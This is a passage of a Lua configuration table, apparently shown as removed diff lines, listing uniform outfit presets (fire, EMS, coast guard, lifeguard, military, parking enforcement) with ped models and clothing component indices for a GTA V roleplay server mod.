42, 4 }, - { 6, 53, 1 }, - { 7, 15, 1 }, - { 9, 34, 1 }, - { 5, 38, 1 }, - } - }, - ['Female LSCoFD T-Shirt'] = { - category = 'LSCoFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 225, 23 }, - { 3, 110, 1 }, - { 10, 1, 1 }, - { 8, 7, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 34, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSCoFD Jacket'] = { - category = 'LSCoFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 152, 4 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 7 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 2, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSCoFD Jacket'] = { - category = 'LSCoFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 149, 4 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 46, 7 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 2, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSCoFD Winter Jacket'] = { - category = 'LSCoFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 250, 2 }, - { 3, 32, 1 }, - { 10, 59, 2 }, - { 8, 16, 1 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 127, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSCoFD Winter Jacket'] = { - category = 'LSCoFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 258, 2 }, - { 3, 37, 1 }, - { 10, 67, 2 }, - { 8, 15, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 97, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male LSCoFD Water Rescue'] = { - category = 'LSCoFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 24, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 74, 17 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 87, 13 }, - { 6, 3, 1 }, - { 7, 1, 1 }, - { 9, 26, 5 }, - { 5, 1, 1 }, - } - }, - ['Female LSCoFD Water Rescue'] = { - category = 'LSCoFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 26, 4 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 90, 13 }, - { 6, 26, 1 }, - { 7, 1, 1 }, - { 9, 28, 5 }, - { 5, 49, 1 }, - } - }, - ['Male BCFD Fireman Class A'] = { - category = 'BCFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 119, 5 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 72, 2 }, - } - }, - ['Male BCFD Fireman Class B'] = { - category = 'BCFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 76, 6 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 72, 2 }, - } - }, - ['Male BCFD Fireman Class C'] = { - category = 'BCFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 75, 6 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 72, 2 }, - } - }, - ['Female BCFD Fireman Class A'] = { - category = 'BCFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 19, 5 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 72, 2 }, - } - }, - ['Female BCFD Fireman Class B'] = { - category = 'BCFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 27, 6 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 72, 2 }, - } - }, - ['Female BCFD Fireman Class C'] = { - category = 'BCFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 26, 6 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 72, 2 }, - } - }, - ['Male BCFD EMT Class B'] = { - category = 'BCFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 76, 5 }, - { 3, 87, 1 }, - { 10, 1, 1 }, - { 8, 55, 1 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 31, 3 }, - { 9, 1, 1 }, - { 5, 72, 1 }, - } - }, - ['Male BCFD EMT Class C'] = { - category = 'BCFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 75, 5 }, - { 3, 86, 1 }, - { 10, 1, 1 }, - { 8, 55, 1 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 31, 3 }, - { 9, 1, 1 }, - { 5, 72, 1 }, - } - }, - ['Female BCFD EMT Class B'] = { - category = 'BCFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 27, 5 }, - { 3, 102, 1 }, - { 10, 1, 1 }, - { 8, 7, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 15, 3 }, - { 9, 1, 1 }, - { 5, 72, 1 }, - } - }, - ['Female BCFD EMT Class C'] = { - category = 'BCFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 26, 5 }, - { 3, 110, 1 }, - { 10, 1, 1 }, - { 8, 7, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 15, 3 }, - { 9, 1, 1 }, - { 5, 72, 1 }, - } - }, - ['Male BCFD T-Shirt'] = { - category = 'BCFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 24, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 74, 16 }, - { 3, 86, 1 }, - { 10, 1, 1 }, - { 8, 55, 1 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 30, 1 }, - { 5, 1, 1 }, - } - }, - ['Female BCFD EMT T-Shirt'] = { - category = 'BCFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 225, 24 }, - { 3, 110, 1 }, - { 10, 1, 1 }, - { 8, 7, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 34, 1 }, - { 5, 49, 1 }, - } - }, - ['Male BCFD Jacket'] = { - category = 'BCFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 152, 5 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 9 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Female BCFD Jacket'] = { - category = 'BCFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 149, 5 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 46, 9 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 2, 1 }, - { 5, 49, 1 }, - } - }, - ['Male BCFD Winter Jacket'] = { - category = 'BCFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 250, 1 }, - { 3, 32, 1 }, - { 10, 59, 1 }, - { 8, 16, 1 }, - { 4, 26, 4 }, - { 6, 52, 1 }, - { 7, 127, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female BCFD Winter Jacket'] = { - category = 'BCFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 258, 1 }, - { 3, 37, 1 }, - { 10, 67, 1 }, - { 8, 15, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 97, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male BCFD Water Rescue'] = { - category = 'BCFD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 24, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 74, 16 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 87, 13 }, - { 6, 3, 1 }, - { 7, 1, 1 }, - { 9, 26, 6 }, - { 5, 1, 1 }, - } - }, - ['Female BCFD Water Rescue'] = { - category = 'BCFD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 26, 6 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 42, 4 }, - { 6, 26, 1 }, - { 7, 1, 1 }, - { 9, 28, 6 }, - { 5, 49, 1 }, - } - }, - ['Male SAMS EMT Class A'] = { - category = 'SAMS', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 119, 7 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 128, 1 }, - { 9, 1, 1 }, - { 5, 39, 1 }, - } - }, - ['Male SAMS EMT Class B'] = { - category = 'SAMS', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 76, 7 }, - { 3, 87, 1 }, - { 10, 1, 1 }, - { 8, 55, 1 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 31, 1 }, - { 9, 15, 1 }, - { 5, 39, 1 }, - } - }, - ['Male SAMS EMT Class C'] = { - category = 'SAMS', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 75, 7 }, - { 3, 86, 1 }, - { 10, 1, 1 }, - { 8, 55, 1 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 31, 1 }, - { 9, 30, 1 }, - { 5, 39, 1 }, - } - }, - ['Female SAMS EMT Class A'] = { - category = 'SAMS', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 19, 7 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 7, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 98, 1 }, - { 9, 1, 1 }, - { 5, 39, 1 }, - } - }, - ['Female SAMS EMT Class B'] = { - category = 'SAMS', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 27, 7 }, - { 3, 102, 1 }, - { 10, 1, 1 }, - { 8, 7, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 15, 2 }, - { 9, 17, 1 }, - { 5, 39, 1 }, - } - }, - ['Female SAMS EMT Class C'] = { - category = 'SAMS', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 26, 7 }, - { 3, 110, 1 }, - { 10, 1, 1 }, - { 8, 7, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 15, 2 }, - { 9, 34, 1 }, - { 5, 39, 1 }, - } - }, - ['Male SAMS Jacket'] = { - category = 'SAMS', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 152, 6 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 8 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 2, 1 }, - { 5, 49, 1 }, - } - }, - ['Female SAMS Jacket'] = { - category = 'SAMS', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 149, 6 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 46, 8 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 2, 1 }, - { 5, 49, 1 }, - } - }, - ['Male SAMS Winter Jacket'] = { - category = 'SAMS', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 250, 1 }, - { 3, 32, 1 }, - { 10, 60, 1 }, - { 8, 16, 1 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 128, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female SAMS Winter Jacket'] = { - category = 'SAMS', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 258, 1 }, - { 3, 37, 1 }, - { 10, 68, 1 }, - { 8, 15, 1 }, - { 4, 42, 4 }, - { 6, 53, 1 }, - { 7, 98, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male USCG Fatigues'] = { - category = 'USCG', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 38, 3 }, - { 3, 1, 1 }, - { 10, 25, 1 }, - { 8, 16, 1 }, - { 4, 53, 3 }, - { 6, 25, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female USCG Fatigues'] = { - category = 'USCG', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 113, 3 }, - { 3, 15, 1 }, - { 10, 24, 1 }, - { 8, 15, 1 }, - { 4, 55, 3 }, - { 6, 25, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male U.S Coast Guard'] = { - category = 'USCG', - ped = 'mp_m_freemode_01', - props = { - { 0, 88, 1 }, - { 1, 16, 10 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 42, 1 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 88, 1 }, - { 4, 53, 3 }, - { 6, 25, 1 }, - { 7, 2, 1 }, - { 9, 26, 4 }, - { 5, 49, 1 }, - } - }, - ['Male USCG Swat'] = { - category = 'USCG', - ped = 'mp_m_freemode_01', - props = { - { 0, 76, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 53, 1 }, - { 11, 54, 4 }, - { 3, 97, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 53, 3 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 17, 2 }, - { 5, 49, 1 }, - } - }, - ['Female USCG SWAT'] = { - category = 'USCG', - ped = 'mp_f_freemode_01', - props = { - { 0, 75, 3 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 47, 4 }, - { 3, 112, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 55, 3 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 19, 2 }, - { 5, 49, 1 }, - } - }, - ['Female U.S Coast Guard'] = { - category = 'USCG', - ped = 'mp_f_freemode_01', - props = { - { 0, 87, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 39, 1 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 66, 1 }, - { 4, 55, 3 }, - { 6, 25, 1 }, - { 7, 2, 1 }, - { 9, 28, 4 }, - { 5, 1, 1 }, - } - }, - ['Male USCG Onepiece'] = { - category = 'USCG', - ped = 'mp_m_freemode_01', - props = { - { 0, 88, 1 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 156, 1 }, - { 3, 97, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 71, 1 }, - { 6, 25, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female USCG Onepiece'] = { - category = 'USCG', - ped = 'mp_f_freemode_01', - props = { - { 0, 87, 1 }, - { 1, 28, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 153, 1 }, - { 3, 112, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 73, 1 }, - { 6, 25, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male USCG Swimmer'] = { - category = 'USCG', - ped = 'mp_m_freemode_01', - props = { - { 0, 91, 1 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 36, 1 }, - { 11, 156, 2 }, - { 3, 97, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 71, 1 }, - { 6, 68, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female USCG Swimmer'] = { - category = 'USCG', - ped = 'mp_f_freemode_01', - props = { - { 0, 90, 1 }, - { 1, 28, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 36, 1 }, - { 11, 153, 2 }, - { 3, 112, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 73, 1 }, - { 6, 71, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male USCG Jumpsuit'] = { - category = 'USCG', - ped = 'mp_m_freemode_01', - props = { - { 0, 79, 5 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 66, 3 }, - { 3, 97, 1 }, - { 10, 27, 1 }, - { 8, 16, 1 }, - { 4, 39, 3 }, - { 6, 25, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female USCG Jumpsuit'] = { - category = 'USCG', - ped = 'mp_f_freemode_01', - props = { - { 0, 78, 5 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 60, 3 }, - { 3, 19, 1 }, - { 10, 26, 1 }, - { 8, 15, 1 }, - { 4, 39, 3 }, - { 6, 25, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male USCG Pilot'] = { - category = 'USCG', - ped = 'mp_m_freemode_01', - props = { - { 0, 79, 5 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 156, 3 }, - { 3, 97, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 71, 2 }, - { 6, 25, 1 }, - { 7, 120, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female USCG Pilot'] = { - category = 'USCG', - ped = 'mp_f_freemode_01', - props = { - { 0, 78, 5 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 153, 3 }, - { 3, 19, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 73, 2 }, - { 6, 25, 1 }, - { 7, 2, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Lifeguard Bathsuit'] = { - category = 'Lifeguard', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 16, 1 }, - { 3, 16, 1 }, - { 10, 1, 1 }, - { 8, 20, 1 }, - { 4, 7, 4 }, - { 6, 35, 1 }, - { 7, 16, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female Lifeguard Swimsuit'] = { - category = 'Lifeguard', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 12, 4 }, - { 3, 12, 1 }, - { 10, 1, 1 }, - { 8, 19, 1 }, - { 4, 18, 5 }, - { 6, 36, 1 }, - { 7, 20, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Lifeguard Clothes'] = { - category = 'Lifeguard', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 23, 1 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 7, 4 }, - { 6, 35, 1 }, - { 7, 16, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female Lifeguard Clothes'] = { - category = 'Lifeguard', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 24, 1 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 15, 1 }, - { 4, 11, 4 }, - { 6, 36, 1 }, - { 7, 20, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male National Guard Fatigues'] = { - category = 'National Guard', - ped = 'mp_m_freemode_01', - props = { - { 0, 29, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 38, 2 }, - { 3, 1, 1 }, - { 10, 23, 1 }, - { 8, 16, 1 }, - { 4, 88, 1 }, - { 6, 36, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female National Guard Fatigues'] = { - category = 'National Guard', - ped = 'mp_f_freemode_01', - props = { - { 0, 29, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 113, 2 }, - { 3, 15, 1 }, - { 10, 22, 1 }, - { 8, 15, 1 }, - { 4, 91, 1 }, - { 6, 37, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male U.S. Army Combat Uniform'] = { - category = 'National Guard', - ped = 'mp_m_freemode_01', - props = { - { 0, 40, 4 }, - { 1, 24, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 54, 3 }, - { 3, 17, 1 }, - { 10, 15, 1 }, - { 8, 16, 1 }, - { 4, 38, 3 }, - { 6, 36, 1 }, - { 7, 43, 1 }, - { 9, 16, 1 }, - { 5, 49, 1 }, - } - }, - ['Female U.S. Army Combat Uniform'] = { - category = 'National Guard', - ped = 'mp_f_freemode_01', - props = { - { 0, 39, 4 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 47, 3 }, - { 3, 18, 1 }, - { 10, 14, 1 }, - { 8, 15, 1 }, - { 4, 37, 3 }, - { 6, 37, 1 }, - { 7, 30, 1 }, - { 9, 18, 1 }, - { 5, 49, 1 }, - } - }, - ['Male USAF Fatigues'] = { - category = 'USAF', - ped = 'mp_m_freemode_01', - props = { - { 0, 29, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 64, 1 }, - { 3, 1, 1 }, - { 10, 24, 1 }, - { 8, 3, 2 }, - { 4, 88, 2 }, - { 6, 36, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female USAF Fatigues'] = { - category = 'USAF', - ped = 'mp_f_freemode_01', - props = { - { 0, 29, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 57, 1 }, - { 3, 15, 1 }, - { 10, 23, 1 }, - { 8, 15, 1 }, - { 4, 91, 2 }, - { 6, 37, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male USAF Pilot Uniform'] = { - category = 'USAF', - ped = 'mp_m_freemode_01', - props = { - { 0, 39, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 49, 1 }, - { 3, 17, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 31, 1 }, - { 6, 25, 1 }, - { 7, 34, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female USAF Pilot Uniform'] = { - category = 'USAF', - ped = 'mp_f_freemode_01', - props = { - { 0, 38, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 42, 1 }, - { 3, 18, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 30, 1 }, - { 6, 25, 1 }, - { 7, 17, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male Parking Enforcement Class A'] = { - category = 'Parking Enforcement', - ped = 'mp_m_freemode_01', 